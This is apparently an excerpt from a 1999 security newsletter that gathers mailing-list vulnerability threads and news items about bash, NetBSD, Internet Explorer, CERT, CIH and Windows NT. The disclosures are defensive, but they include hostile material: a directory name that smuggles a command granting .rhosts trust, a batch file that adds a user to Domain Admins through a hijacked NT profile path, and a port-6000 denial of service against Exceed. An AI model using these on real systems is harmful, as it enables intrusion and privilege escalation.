> Bash 1.x screws up during PS1 substitution (\w, \W). Bash 2.x does not
> seem to be vulnerable. Anyway, there's a hope even for those who want to
> stick to 1.x: replace \w with $PWD, \W with ${PWD##*/} (no guarantee).
This is correct; the bug was fixed in bash-2.0, which was released in
December, 1996. If you're still running 1.14.x, or earlier versions,
you should upgrade to bash-2.03.
--
``The lyf so short, the craft so long to lerne.'' - Chaucer
( ``Discere est Dolere'' -- chet)
Chet Ramey, Case Western Reserve University Internet: chet@po.CWRU.Edu
----------------------------------------------------------------------------
Date: Fri, 23 Apr 1999 11:25:58 +0100
From: Ph. Rueegsegger <philip.rueegsegger@BRUKER.CH>
To: BUGTRAQ@netspace.org
Subject: Re: Bash Bug
Date sent: Thu, 22 Apr 1999 01:39:48 +0100
Send reply to: Andy Church <achurch@DRAGONFIRE.NET>
>From: Andy Church <achurch@DRAGONFIRE.NET>
Subject: Re: Bash Bug
Originally to: shadow@OPERATOR.ORG
To: BUGTRAQ@netspace.org
Hello together
> >Figured while everyone was working with bash, I might as well
make this
> >one public(I apologize if this is old news, apparently it hasnt been fixed
> >if so).
> >
> >If a user creates a directory with a command like
> >
> >mkdir "\ `echo -e \ "echo + +> ~\57.rhosts\ " > x; source x; rm -f \x\ ` "
Not bad !
> >
> >and someone cd's into said directory, either by accident, or whatever,
> >then it will cause it to actually execute.
>
> Just to clarify, this only happens if PS1 (the bash prompt) contains
> \w or \W _and_ a prompt is displayed containing the bogus directory name.
> This means unattended shell scripts are safe. As a workaround, use `pwd`
> in place of \w.
Sorry, with bash version 2.01.1 (supplied with SuSE5.3) is just the
opposite of what you are clarifying. If one has \w or \W specified in
PS1 to show the path, it does NOT happen and if `pwd` is specified
instead of \w or \W it DOES happen.
>
> Tested with bash 1.14 (it's the only one I have handy).
>
> --Andy Church
> achurch@dragonfire.net
> http://achurch.dragonfire.net/
Kind regards
Phibus
-----------------------------------------------------------
Philip Rueegsegger
System Manager
Bruker AG Direct dial : +41-1-825 93 46
Industriestrasse 26 Telephone : +41-1-825 91 11
CH-8117 Faellanden Telefax : +41-1-825 94 69
Switzerland E-Mail : philip.rueegsegger@bruker.ch
-----------------------------------------------------------
----------------------------------------------------------------------------
Date: Tue, 27 Apr 1999 16:38:15 +0200
From: Peter J. Holzer <hjp@WSR.AC.AT>
To: BUGTRAQ@netspace.org
Subject: Re: Buffer overflow in BASH
On 1999-04-19 14:59:06 -0400, Adam D. McKenna wrote:
> I really don't see the point of people posting bash bugs here.
> Especially not bugs in old versions. There are a lot of bash bugs, you
> can't gain any extra priveleges by exploiting them though.
You can, if you can trigger the bug in a script which is not running
with your privileges - suid and cgi scripts are obvious examples.
So, posting bash bug reports at least reminds people that using
bash - especially old versions - for such scripts is not a good idea.
hp
--
_ | Peter J. Holzer | Where do you want your keys
|_|_) | Sysadmin WSR / Obmann LUGA | to go today?
| | | hjp@wsr.ac.at | -- Tom Perrine <tep@SDSC.EDU>
__/ | http://wsrx.wsr.ac.at/~hjp/ | on bugtraq 1999-04-20
@HWA
32.0 NetBSD Security Advisory 1999-009
Date: Wed, 21 Apr 1999 11:19:23 +1000
From: matthew green <mrg@ETERNA.COM.AU>
To: BUGTRAQ@netspace.org
Subject: NetBSD Security Advisory 1999-009
-----BEGIN PGP SIGNED MESSAGE-----
NetBSD Security Advisory 1999-009
=================================
Topic: SVR4 compatibility device creation vulnerability
Version: NetBSD 1.3.3 and prior; NetBSD-current until 19990420
Severity: Local users can access and modify any data on first IDE disk
Abstract
========
In order to provide a system environment capable of executing System V
Release 4 (`SVR4') binaries, it is necessary to create a set of device
special files; to simplify this task, a shell script is shipped with
the system. Due to a mismatch of device major numbers between NetBSD
platforms, one device special file is erroneously created with a wrong
major number, which may allow a regular user to arbitrarily read or
write any data stored on the NetBSD portion of the first IDE disk
configured by the system.
This vulnerability is restricted to the i386 port of NetBSD with SVR4
emulation additionally configured only.
Technical Details
=================
The SVR4 /dev/wabi character device special file, usually created
below the /emul/svr4 hierarchy, is currently supposed to be a synonym
for the /dev/null device special file.
Originally developed on the sparc port of NetBSD, the SVR4_MAKEDEV
shell script creates this file with a major number of 3 and a minor
number of 2, setting these properties equivalent to those of the
/dev/null device special file on that platform. On the i386 port of
NetBSD, the character device major number 3 is associated with the
wd(4) driver, which supports IDE (and compatible) disks, and whose
minor number 2 denotes the NetBSD portion of the first such disk
configured by the systems; this corresponds to the special device file
/dev/rwd0c in the base distribution. As the /dev/wabi special device
file is created with world read and write permissions, a regular user
may read and write any data stored on that portion of the disk.
The effects of actually running the WABI software on a vulnerable system
have not been investigated.
Solutions and Workarounds
=========================
A patch is available for the NetBSD 1.3.3 which makes the SVR4_MAKEDEV
shell script create the wabi device special file with the correct
properties. You may find this patch on the NetBSD ftp server:
ftp://ftp.NetBSD.ORG/pub/NetBSD/misc/security/patches/19990419-SVR4_MAKEDEV
NetBSD-current since 19990420 is not vulnerable. Users of
NetBSD-current should upgrade to a source tree later than 19990420.
Once the SVR4_MAKEDEV script is updated, re-run it to recreate the
wabi device with the correct parameters.
If this action cannot be taken, an immediate workaround is to remove
the existing device special file and creating a new one, which can be
done by executing the following shell command sequence as the super-user:
# /bin/rm -f /emul/svr4/dev/wabi
# /sbin/mknod /emul/svr4/dev/wabi c 2 2
# /bin/chmod u=rw,g=rw,o=rw /emul/svr4/dev/wabi
Thanks To
=========
The vulnerability was discovered by Klaus Klein <kleink@ira.uka.de>,
who also provided the solution and authored this advisory.
Revision History
================
1999/04/17 - initial version
1999/04/19 - dates were incorrect
More Information
================
Information about NetBSD and NetBSD security can be found at
http://www.NetBSD.ORG/ and http://www.NetBSD.ORG/Security/.
Copyright 1999, The NetBSD Foundation, Inc. All Rights Reserved.
$NetBSD: NetBSD-SA1999-009.txt,v 1.2 1999/04/19 15:07:52 mrg Exp $
-----BEGIN PGP SIGNATURE-----
Version: 2.6.3ia
Charset: noconv
iQCVAwUBNxwkvz5Ru2/4N2IFAQEbuQQAtv2ho3MWYYihmZBagGnX6Wd0KD+mTIh0
liV32yx46kVELmCGrS4pEQh3fBNNgYkYBjympKrC/Iy1Vj9DMAMBNLGedFu10yXT
oJnKLcmNmjEE8qRnqwjBRUIn/kURvG6wakgC9n6OuCOIcdtYeiUmgFhoPyl4lzKf
FRpxHkqZnLo=
=9Ypx
-----END PGP SIGNATURE-----
@HWA
33.0 Explorer favicon.ico bug introduces new vulnerabilties
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Date: Fri, 16 Apr 1999 22:11:22 -0700
From: "Robert David Graham" <rob@netice.com>
Subject: favicon.ico
In case you haven't heard, Microsoft has a new feature in IE 5.0 web
browser. When you add a website to you "Favorites" (aka. Bookmarks for you
Netscape users), the browser attempts to download a graphic called
"favicon.ico", then show that icon along with the title of the webpage.
This has two risks.
First of all, the website owner is notified when you the page to your
favorites, revealing information about yourself. A discussion of this can be
found at http://msdn.microsoft.com/workshop/essentials/versions/ICPIE5.asp
This privacy risk is probably minor, but I've seen several press articles on
the subject.
The second RISK is much more severe. Go to AltaVista (or any search engine)
and search for "favicon.ico". You now have a list of 500 websites that
expose their access logs. In the logs, you can find several websites that
expose the URLs of CGI scripts, including passwords. Through manual
searching, I found 2 sites that exposed logon information; I'm sure I can
write a program that would scan those logs to look for CGI programs and get
even more. This also exposes even more privacy information because these
logs often contain the Referer field as well.
This isn't unique to "favicon.ico". The RISK is really:
* people are unintentionally exposing access logs on their web sites,
exposing user information and possible passwords.
* hackers can easily find vulnerable systems not by scanning the site itself
(which can be detected by intrusion detection systems), but by searching a
3rd party like AltaVista.
Robert Graham
CTO, Network ICE
http://www.networkice.com/advice
@HWA
34.0 Lets hear it for CERT the good guys!
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
via HNN http://www,hackernews.com/
CERT the Good Guys?
contributed by turtlex
Obviously written by someone who didn't even bother
looking for an opposing viewpoint this ABC News article
praises CERT for all the good work that they have done.
While CERT does try lets not forget that they are in bed
with the vendors are usually several months late with
advisories. This article ignores all of that and labels
them as "the users last hope".
ABC News;
http://abcnews.go.com/sections/tech/DailyNews/cert990422.html
The Internets Men in Black
CERT Serves and Protects Netizens
By Michael J. Martinez
ABCNEWS.com
April 24 In November 1988, a student at Cornell University unleashed a worm, or self-replicating computer
program, upon the nascent Internet. The worm invaded the academic computers that hosted the Net, hogging
all of their processing power. Though the worm invaded fewer than 5 percent of the host computers, the
entire system was shut down for days while an ad hoc team of academics struggled to eject it. Officials at
the U.S. Defense Department, which sponsored the original ARPANET and its evolution to the Internet, quickly
decided that coordinated efforts were needed to combat such invasions. Thus was born the Computer Emergency
Response Team Coordination Center (CERT/CC, commonly known as CERT).
In the 10 years since, the 15-member CERT, hosted by the Software Engineering Institute at Carnegie Mellon
University, has become the de facto defender of the Internet, helping users around the world protect themselves
from all sorts of computer menaces.
Users Last Hope
Many corporations, government agencies and universities now have their own computer emergency response teams.
CERT was the first, and it still has the broadest charter of any such team: protect the Internet.
Were kind of the last hope for a lot of people, says Jeff Carpenter, head of the incident response team at
CERT. When administrators cant figure out whats going on, they call us.
CERT gets dozens of phone calls and e-mails every day from system administrators (sysadmins, in the industry
jargon) around the world, describing virus infestations, minor system infiltrations and widespread attacks by
malicious hackers. Weve seen almost everything, Carpenter says. A very small percentage of what we receive are
reports of new problems. Theres very little out there that really surprises us.
The Melissa virus, which made global headlines in late March, was nothing new to CERT except for the fact
that it spread faster than nearly anything else seen before. The CERT team put out an advisory on Melissa within
days of its release, after a marathon overnight analysis session. The virus appeared on a Friday; the advisory was
posted on the CERT Web site early Saturday morning.
In Melissas case, we put out the alert because we knew it would become far worse without that kind of
awareness, Carpenter says. We knew that people would come in on Monday and if they werent warned, theyd
start spreading it even further.
Advisers, Not Policemen
One of the common misconceptions about CERT is that it exists to catch malicious hackers and virus writers. But
CERT is not a law enforcement agency. Instead, the center focuses on responding quickly to specific attacks and to
potential vulnerabilities, and making sure they dont happen again.
The center is divided into two teams: the incident response team and the vulnerability assessment team. While
the incident response team helps system administrators recover from a hacking or virus incident, the vulnerability
assessment team responds to inquiries about inherent software problems.
These problems dont come in from security researchers or anything like that, says Shawn Hernan, who
heads the vulnerability team. These are from sysadmins who are probably using their software in ways that the
vendor might not have considered.
Preventive Measures
So far this year, there have been only four major CERT advisories. Besides the Melissa virus, two spelled out new
tricks in the placement of Trojan horse programs (applets that appear harmless, but release viruses or hacking tools
once activated). The fourth dealt with a variation on an old way to sneak programming code into a server.
The rest of the time, CERT team members advise system administrators and software vendors on the best
ways to protect themselves.
You would really be amazed at how many people just dont take the time to download the patches they need from
their software and anti-virus vendors, Carpenter says. We always tell them to make sure that every single patch is
installed. Otherwise its fairly easy for an intruder to gain access.
CERT is really invaluable, says Motoaki Yumamura, an anti-virus researcher at Symantec Corp. They give us a
lot of great information, which we can translate into products to help our customers.
For CERT researchers, however, the responsibilities and rewards go beyond commercial concerns.
The Internet is the best opportunity for new and exciting societal changes says Hernan. To work in an
organization like CERT is to have a positive effect on the Internet.
@HWA
35.0 NASA finds scapegoat? - Programmer indicted
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www,hackernews.com/ April 29th
NASA Finds Scapegoat?
contributed by Dave Merritt
After notifying NASA of several serious security holes, of
which anyone with a login account could access, NASA
chose to cover it up and make a scapegoat out of the
individual. This news article has twisted the story to
make it seem that Dave Merritt had malicious intentions
while he claims he was trying to help by pointing out
possible vulnerabilities. Mr. Merritt is seeking legal
representation. If anyone can help please contact us
here. (Why is a case against NASA being prosecuted by
a County DA, doesn't the fact that it is NASA make it a
federal crime?)
Houston Chronicle
http://www.chron.com/cgi-bin/auth/story.mpl/content/interactive/space/news/99/990427.html
April 26, 1999, 08:39 p.m.
Programmer who allegedly broke into NASA computers is
indicted
By STEVE BREWER
Copyright 1999 Houston Chronicle
A programmer who once wrote software for the international space station was indicted Monday on
accusations that he took a code-breaking program off the Internet and used it to explore NASA
computers.
David Merritt, 41, was charged with breach of computer security, said Assistant Harris County District
Attorney Terry Jennings. Bail was set at $2,000, and Merritt was scheduled to turn himself into
authorities.
Jennings said no serious damage was done to NASA's computers and that Merritt only used the illegal
access to explore parts of the system he couldn't normally get into.
But, Jennings said, NASA spent $19,000 in man-hours to investigate the problem and ensure Merritt
hadn't caused any permanent harm. In such cases, the prosecutor added, those expenditures are counted
as criminal damages.
Lance Carrington, NASA's acting assistant inspector general in Washington D.C., told the Chronicle
Monday that much of the effort in these inquires is usually spent ensuring that no one can access the
computers the same way again.
Carrington's office conducted the initial investigation into Merritt's case.
Jennings said the hacking occurred between May 14 and 18 at NASA's Sonny Carter Training Facility,
where Merritt was working on the space station project. He worked for Geo Control Systems, a Clear
Lake company, which was a subcontractor to Boeing, NASA's prime contractor on the project.
For his job, Merritt had limited access to the system used to write software, but somehow he got
encrypted passwords of other users and downloaded them to his desktop, Jennings said. He then used an
Internet password-cracking tool called "John the Ripper" to decipher them.
Armed with the passwords, Merritt then accessed other parts of the NASA computer system, Jennings
said, then later told a supervisor he had "found" the passwords.
A Geo Control Systems employee fielding questions on the case would only identify himself by his first
name when contacted by the Chronicle Monday. Other than to say that Merritt no longer worked for the
company, he said he would only comment on the case if the name of the company was not published.
Carrington said Merritt's case is relatively minor. But he said the fact that code-breaking technology is
easily available on the Internet concerns government agencies that depend on high-tech computers.
"Because of the climate today with the evolving technology, we're overly sensitive to it. It's very
disconcerting that this information is out there," Carrington said. "It makes life tough that you've got to
deal with people like that -- people who know their stuff and amateurs who can get this information
that's becoming more user-friendly.
Carrington said NASA has handled several high-profile cases in which hackers have breached agency
systems. NASA has begun hiring experts who once worked for the military and the National Security
Agency to investigate those kinds of cases.
The near six-year task of assembling the space station began last year. It's not staffed at this point. The
project is led by the United States, and its partners include Russia, Europe, Japan and Canada.
The charge against Merritt is a state jail felony, punishable by up to two years in jail and up to a $10,000
fine.
Chronicle reporter Mark Carreau contributed to this story.
@HWA
36.0 CIH author found?
~~~~~~~~~~~~~~~~~
CIH Author Identified?
From HNN http://www.hackernews.com/ April 29th
contributed by mdef
The Tatung Institute of Technology claims that it has
found the author of the CIH or Chernobyl virus. They
claim that they had punished Chen Ing-hau last April
when the virus he wrote as a student began to cause
damage in an inter-college data system, according to
Lee Chee-chen, the institute's dean of student affairs.
Chen Ing-hau has since graduated and is currently
serving his compulsory two year stint in the Taiwanese
military.
CNN
http://www.cnn.com/TECH/computing/9904/29/computer.virus.ap/index.html
Nando Times
http://www.techserver.com/story/body/0,1634,43487-70127-507733-0,00.html
CNN;
Taiwan college identifies computer virus author
April 29, 1999
Web posted at: 9:32 a.m. EDT (1332 GMT)
TAIPEI, Taiwan (AP) -- A former computer engineering student was
identified by his college today as the author of the Chernobyl virus -- the
menace that caused hundreds of thousands of computer meltdowns around the world this week.
The Tatung Institute of Technology had punished Chen Ing-hau last April
when the virus he wrote as a student began to cause damage in an
inter-college data system, according to Lee Chee-chen, the institute's dean of
student affairs.
Chen, who was a senior at the time, was given a demerit but not expelled.
The Chernobyl virus is known in Taiwan as the CIH, using Chen's initials.
The college did not mete out a more severe punishment because Chen had
warned fellow students not to spread the virus, Lee said. Chen did not come
up with an anti-virus program, Lee said.
Lee said he was not sure how the virus ended up causing so much destruction
a year later.
Chen graduated from the college last summer and now is serving Taiwan's
two-year compulsory military service, Lee said. Officials of the Bureau of
Criminal Investigation said they would seek permission to question Chen.
The unusually destructive virus -- timed to strike on April 26, the 13th
anniversary of the Chernobyl nuclear disaster -- tries to erase a computer's
hard drive and write gibberish into its system settings to prevent the machine
from being restarted.
Turkey and South Korea each reported 300,000 computers damaged Monday,
and there were more elsewhere in Asia and the Middle East. Fewer than
10,000 of the 50 million computers in the United States were affected.
Copyright 1999 The Associated Press. All rights reserved.
@HWA
37.0 INTEL goes after Zero Knowledge Systems
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com April29th
Intel goes after Zero Knowledge
contributed by Carole
Zero Knowledge Systems has found a way to make the
PIII serial number, that had been hidden, visible without
the knowledge of the computer owner. Intel, using its
large corporate muscle has persuaded Symantec to
included the Zero Knowledge software as part of Norton
AntiVirus and have it flagged as malicious code. Now
when a Norton user visits the Zero Knowledge Web site
the AV detections software goes off. Intel and Zero
Knowledge are reportedly in discussions over this
matter.
C|Net http://www.news.com/News/Item/0,4,35834,00.html?st.ne.fd.tohhed.ni
ZD Net http://www.zdnet.com/zdnn/stories/news/0,4586,2249416,00.html
Intel http://www.intel.com
Zero Knowledge Systems http://www.zks.net/
C|Net;
Intel still wrestling serial number debacle
By Reuters
Special to CNET News.com
April 29, 1999, 2:40 p.m. PT
URL: http://www.news.com/News/Item/0,4,35834,00.html
Intel, the world's leading chipmaker, is still grappling with a consumer-relations
problem that stems from its decision to embed a serial number in its Pentium III micro
chips, according to reports.
Intel in January reacted quickly to complaints from privacy advocates about the serial
numbers by distributing software that enabled owners of computers containing
Pentium III chips to hide the number.
But the problem has not gone away, the New York Times reported today. The newspaper
reported that a small Canadian software maker has found a way to make the serial number,
that has been hidden, visible without the knowledge of the computer owner.
The problem is not new. On March 10, Montreal-based Zero-Knowledge developed an ActiveX
control that retrieved the serial number under certain circumstances, even after a software
repair released by Intel disabled the feature and ostensibly "hid" the number from prying eyes.
Then, on March 19, antivirus software firm Symantec announced it would provide "detection and
elimination" of the Pentium III hack from Zero-Knowledge on its Web site for download. Symantec
also said it would be part of its regular weekly virus definitions.
The Times report, however, seems to indicate that a war of words has continued to linger over
the issue.
Intel has reacted by persuading Symantec to include the Zero-Knowledge program on its list of
malicious programs. Consequently, users who visit the Zero-Knowledge site get a warning that the
program is a virus.
Zero-Knowledge executives have said that Intel has unfairly portrayed it as outlaws, the newpaper
said.
The issue of the serial number has been a volatile one for Intel because privacy advocates have
said the serial number allows direct marketers and data-mining companies to track the patterns of
Web surfers. They also say it is a poor way to protect against theft, the initial purpose of the
serial number.
An Intel spokesman said the company has been discussing the vulnerability of the serial number
with Zero-Knowledge executives, the newspaper reported.
News.com's Michael Kanellos contributed to this report.
Story Copyright © 1999 Reuters Limite
d. All rights reserved.
@HWA
38.0 NT-Exceed DoS
~~~~~~~~~~~~~
Date: Tue, 27 Apr 1999 13:29:26 -0700
From: "LaFournaise, Chris J." <cjlafournaise@ESCOCORP.COM>
To: BUGTRAQ@netspace.org
Subject: NT/Exceed D.O.S.
This is regarding Hummingbird's Exceed X emulator v5 (and possibly v6)
running on Windows NT. I haven't tested Win95/98.
The Exceed X server allows inbound TCP connections on port 6000 from the XDM
host. If someone uses telnet from the XDM host to connect to a PC running
Exceed on port 6000 and enters any garbage text, the X server will hang and
the Exceed session is frozen for good.
I have notified Hummingbird via their tech support web site but have not
received a response yet.
Chris LaFournaise
cjlafournaise@escocorp.com
----------------------------------------------------------------------------
Date: Wed, 28 Apr 1999 23:34:26 +0100
From: Steve <steve@STANDAY.KEBLE.OX.AC.UK>
To: BUGTRAQ@netspace.org
Subject: Re: NT/Exceed D.O.S.
> This is regarding Hummingbird's Exceed X emulator v5 (and possibly v6)
> running on Windows NT. I haven't tested Win95/98.
>
> The Exceed X server allows inbound TCP connections on port 6000 from the XDM
> host. If someone uses telnet from the XDM host to connect to a PC running
> Exceed on port 6000 and enters any garbage text, the X server will hang and
> the Exceed session is frozen for good.
As far as I know, a variation of that bug has been present in all versions
>from the early Exceed for MS-Dos onwards. I stumbled on it 5 years ago when
I was a student, so I didn't know whether it was a configuration error or a
bug.
I don't think I managed to permanently freeze the connection then, but it
was certainly possible to freeze it for as long as you left the telnet
connection to port 6000 open. If I remember correctly, it didn't use to
be just the XDM host that could make the connection, you could freeze Exceed
>from any host. I guess that would depend on the setting of the 'Host Access
Control List' field.
For the record, I've just tested Exceed v6 under Windows 98 and it still has
the same effect. I also tested setting Exceed to only allow a given machine
to connect, and I can still freeze it by telnetting from another machine
in another subnet...
I didn't manage to freeze it beyond the telnet session to port 6000 though.
Steve.
----------------------------------------------------------------------------
Date: Thu, 29 Apr 1999 09:23:11 -0600
From: Max Norris <pedhrm.mnorris@STATE.UT.US>
To: BUGTRAQ@netspace.org
Subject: Re: NT/Exceed D.O.S.
I wasn't able to duplicate a mini-DOS running eXceed 6.0.2.0 on NT 4.0 SP4.
Steps:
On NT machine, opened xterm session
Went to box that I just opened the session with, type in TELNET <my_ip_addr> 6000
The eXceed program hung for about 2 minutes as the host tried to connect to it, but everything else still worked in NT.
After attempting to connect, it will say it is connected for about 2 seconds and then states "Connection closed by foreign
host".
After that the eXceed session resumed and I was able to close out gracefully.
Max Norris
pedhrm.mnorris@state.ut.us
>>> "LaFournaise, Chris J." <cjlafournaise@ESCOCORP.COM> 04/27 2:29 PM >>>
This is regarding Hummingbird's Exceed X emulator v5 (and possibly v6)
running on Windows NT. I haven't tested Win95/98.
The Exceed X server allows inbound TCP connections on port 6000 from the XDM
host. If someone uses telnet from the XDM host to connect to a PC running
Exceed on port 6000 and enters any garbage text, the X server will hang and
the Exceed session is frozen for good.
I have notified Hummingbird via their tech support web site but have not
received a response yet.
Chris LaFournaise
cjlafournaise@escocorp.com
----------------------------------------------------------------------------
Date: Wed, 28 Apr 1999 17:39:00 -0700
From: Ian Westcott <rakarra@PACBELL.NET>
To: BUGTRAQ@netspace.org
Subject: Re: NT/Exceed D.O.S.
On Tue, Apr 27, 1999 at 01:29:26PM -0700, LaFournaise, Chris J. wrote:
> This is regarding Hummingbird's Exceed X emulator v5 (and possibly v6)
> running on Windows NT. I haven't tested Win95/98.
>
> The Exceed X server allows inbound TCP connections on port 6000 from the XDM
> host. If someone uses telnet from the XDM host to connect to a PC running
> Exceed on port 6000 and enters any garbage text, the X server will hang and
> the Exceed session is frozen for good.
I just tested Exceed v6.0 under Win95, and it is vulnerable.
--
Ian Westcott | Fly away to a Rainbow in the sky.
ijwestcott@ucdavis.edu | Gold is at the end for each of us to find.
-==(UDIC)==- | There the road begins where another one will end.
Rakarra@FurryMUCK, IRC | Here the four winds know,
Dragon Code: DC.D f+ | Who will break and who will bend.
s- h- Cgold>Red a $ | All to be the Master of the Wind.
----------------------------------------------------------------------------
Date: Wed, 28 Apr 1999 13:57:51 -0700
From: Matt Wilbur <matt@PHOTON.COM>
To: BUGTRAQ@netspace.org
Subject: Re: NT/Exceed D.O.S.
Exceed (an X server, not an X emulator) version 6.0.1.0 on NT appears to
have fixed this problem, somewhat...
Telnetting to port 6000 locks the server up for 20-30 seconds, but it
recovers eventually. Not surprisingly, using netcat has the same effect...
although, contrary to Chris's findings with Exceed 5, I didn't need to send
any garbage characters, the connection alone did the job. Also, it works
>from any host, not just the one the xdm session had been initiated with,
regardless of host access settings in Xconfig, Exceeds "configuration" tool.
I'd still consider this DoS-bait, when you imagine a one-liner to
continuously connect to port 6000 of your favorite Exceed user's machine.
Matt Wilbur
[snip]
>
> This is regarding Hummingbird's Exceed X emulator v5 (and possibly v6)
> running on Windows NT. I haven't tested Win95/98.
>
> The Exceed X server allows inbound TCP connections on port
> 6000 from the XDM> host. If someone uses telnet from the XDM host to
connect to
> a PC running Exceed on port 6000 and enters any garbage text, the X server
> will hang and the Exceed session is frozen for good.
>
> I have notified Hummingbird via their tech support web site
> but have not received a response yet.
>
> Chris LaFournaise
> cjlafournaise@escocorp.com
>
----------------------------------------------------------------------------
Date: Thu, 29 Apr 1999 11:54:14 -0700
From: Jamie Lawrence <jal@THIRDAGE.COM>
To: BUGTRAQ@netspace.org
Subject: Re: NT/Exceed D.O.S.
I couldn't reproduce either effect with Exceed 6.1 under NTsp3.
Everything behaved normally, both for new and existing sessions.
-j
@HWA
39.0 NT4 Trojaned Profiles
~~~~~~~~~~~~~~~~~~~~~
Date: Wed, 28 Apr 1999 20:36:58 +0100
From: Mnemonix <mnemonix@GLOBALNET.CO.UK>
To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
Subject: NT Security Advisory: Domain user to Domain Admin - Profiles and the Registry
Problem : NT users can cause other users of the system to load a "trojaned" profile that could lead to a system compromise. This
issue has been here for as long as NT 4 has, but I'm not sure if anybody has picked this particular issue up.
Details: When a user logs onto an NT Workstation or Server a new subkey is written to the HKLM\Software\Microsoft\Windows
NT\CurrentVersion\ProfileList registry key. The name of this new key is that of the user's Security Identifier or SID. One of
the values of this key is the ProfileImagePath which points to the location of the user's profile directory. This can reference
a local path (eg %systemroot%\profiles\acc_name) or a UNC path (eg \\PDC\profiles\acc_name).
By default, the permissions on the ProfileList registry key grants the Everybody group the SetValue permission meaning that any
user including guests may edit the information in this subkey and all of its subkeys. Consequently a malicious user of the
system could change another user's ProfileImagePath and get it to load a different profile (eg c:\trojaned-profile) that
contains entries in the Start Up folder that will run when that user next logs on to that system.
Editing these Registry keys can be done local or from across the network. Although remote access to the registry can be
controlled by placing controls on the winreg key, the HKLM\Software\Microsoft\Windows NT\CurrentVersion path into the Registry
is, by default, an AllowedPath, meaning that, irrespective of the ACLs set on the winreg key, a remote user may edit any subkey
under the CurrentVersion key. Note that tools such as Regedit.exe and Regedt32.exe will not be able to be used to to this. The
NT Resource Kit's reg.exe could though because it opens a handle straight to the Registry key in question.
Attack Scenario: This weakness of default settings, could allow a normal domain user to gain domain Administrative rights:
Assuming the attackers machine is called \\DODGY and the PDC is called \\PDC , the user jsmith at \\DODGY creates a new
directory on the root of their C: drive and call it "profile" and copy into it the contents of their own profile and then make
some changes like creating a batch file called addme.bat with the following contents:
net groups "Domain Admins" jsmith /add
del "\\DODGY\C$\profile\start menu\programs\startup\addme.bat"
Once they have logged onto the domain they use reg.exe to open the Administrator's ProfileList key. This is easily found as it
is the SID with a RID of 500. They then edit the ProfileImagePath to point to \\DODGY\C$\profile . Next time the Administrator
logs on at the \\PDC console their profile will be loaded from \\DODGY (because Domain Admins are members of the local
Administrators group they can map to the administrative share on \\DODGY ) and the self deleteing batch file in the StartUp wil
be run adding jsmith to the Domain Admins group.
This whole process can be cleaned up somewhat as in most cases it would be fairly obvious that something is not as it should be
to the Administrator when they log on.
Resolution: The winlogon.exe process actually creates the new subkey when a user logs on - and the key is _not_ created in the
security context of the user currently logging on but rather the SYSTEM account. Only the SYSTEM account, then, needs write
access to the ProfileList key and Everyone else should be given only Read Access. Doing this will not prevent new users from
logging on and they "SID" subkey is still created.
NB:- This issue can also allow users to bypass mandatory profiles etc, etc.
Cheers,
David Litchfield
http://www.infowar.co.uk/mnemonix
http://www.arca.com/
-------------------------------------------------------------------------------------------
Date: Thu, 29 Apr 1999 09:58:35 -0700
From: Paul Leach <paulle@MICROSOFT.COM>
To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
Subject: Re: NT Security Advisory: Domain user to Domain Admin - Profiles and the Registry
> -----Original Message-----
> From: Mnemonix [mailto:mnemonix@GLOBALNET.CO.UK]
> Sent: Wednesday, April 28, 1999 12:37 PM
> To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
> Subject: NT Security Advisory: Domain user to Domain Admin - Profiles
> and the Registry
>
>
> Problem : NT users can cause other users of the system to
> load a "trojaned" profile that could lead to a system
> compromise. This issue has been here for as long as NT 4 has,
> but I'm not sure if anybody has picked this particular issue up.
Yes, they have.
The "Securing Windows NT" Whitepaper from the www.microsoft.com (just use
the search capabiltiy for exactly the phrase in quotes) already notes that
you must ACL the ProfileList key as you suggest.
Paul
-------------------------------------------------------------------------------------------
Date: Thu, 29 Apr 1999 11:44:18 -0700
From: Paul Leach <paulle@MICROSOFT.COM>
To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
Subject: Re: NT Security Advisory: Domain user to Domain Admin - Profiles and the Registry
> -----Original Message-----
> From: Paul Leach [mailto:paulle@MICROSOFT.COM]
> Sent: Thursday, April 29, 1999 9:59 AM
> To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
> Subject: Re: NT Security Advisory: Domain user to Domain Admin -
> Profiles and the Registry
>
>
> > -----Original Message-----
> > From: Mnemonix [mailto:mnemonix@GLOBALNET.CO.UK]
> > Sent: Wednesday, April 28, 1999 12:37 PM
> > To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
> > Subject: NT Security Advisory: Domain user to Domain Admin
> - Profiles
> > and the Registry
> >
> >
> > Problem : NT users can cause other users of the system to
> > load a "trojaned" profile that could lead to a system
> > compromise. This issue has been here for as long as NT 4 has,
> > but I'm not sure if anybody has picked this particular issue up.
>
> Yes, they have.
>
> The "Securing Windows NT" Whitepaper from the
> www.microsoft.com (just use
> the search capabiltiy for exactly the phrase in quotes)
> already notes that
> you must ACL the ProfileList key as you suggest.
I had mistemembered that the above search got exactly one hit -- instead, it
was the first hit on the list. The precise URL is
http://www.microsoft.com/NTServer/security/exec/overview/Secure_NTInstall.as
p
Also, the SCE templates included with SP4 were designed to help automate the
application of the recommendations in the White Paper. So if you want to
make the fix to the ACL on Profile list, I'd suggest looking into them.
Paul
-------------------------------------------------------------------------------------------
Date: Thu, 29 Apr 1999 11:31:23 -0700
From: David LeBlanc <dleblanc@MICROSOFT.COM>
To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
Subject: Re: NT Security Advisory: Domain user to Domain Admin - Profiles and the Registry
> From: Mnemonix [mailto:mnemonix@GLOBALNET.CO.UK]
> Problem : NT users can cause other users of the system to
> load a "trojaned" profile that could lead to a system
> compromise. This issue has been here for as long as NT 4 has,
> but I'm not sure if anybody has picked this particular issue up.
I think you should search the archives on my name with ProfileList as a key,
and that you will find a number of references. Dominique, Paul Leach and I
had an extended discussion on that topic in this list nearly a year ago.
> By default, the permissions on the ProfileList registry key
> grants the Everybody group the SetValue permission
If I'm not mistaken, only the system account ever accesses this key. At
least that's what I found when auditing this tree several months ago.
> Consequently a malicious
